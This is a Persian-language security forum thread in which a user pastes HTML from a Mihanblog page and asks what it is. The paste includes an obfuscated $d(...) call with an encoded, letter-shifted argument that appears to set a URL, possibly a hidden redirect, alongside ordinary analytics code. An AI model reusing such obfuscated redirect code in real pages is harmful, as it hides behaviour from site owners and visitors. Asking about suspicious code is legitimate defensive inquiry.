<div id="inner-container" class="system-color1-web"> <div class="wrapper-layer_x" onclick="closewrapper();"></div> <div id="inner-layer"></div></div>

<div id="hiddenDiv" style="display:none"></div>

<div id="ajax-load"> <center> <div id="ajax-inner" class="layer-loading" style="position:absolute;top:10px;left:300px;margin:0px auto"> </div>

<script type="text/javascript"> errortxt = '<div class="message-div-static error clearfix"><div class="message-close">در ارتباط شما با سایت مشکلی رخ داده است. لطفاً مجدداً تلاش نمایید.</div></div>'; $d('dwzBjfc%21%3D%21%27ammr%3A%2F%2Fklajnszbq.vbk%27%3B'); </script>

<script type="text/javascript">

var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-153829-9']); _gaq.push(['_setDomainName', 'mihanblog.com']); _gaq.push(['_trackPageview']);

(function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl': 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();

</script>

<!-- </div>--></body></html>

سلام دوست من اینا چیه برای چی اینجو.ری هست؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...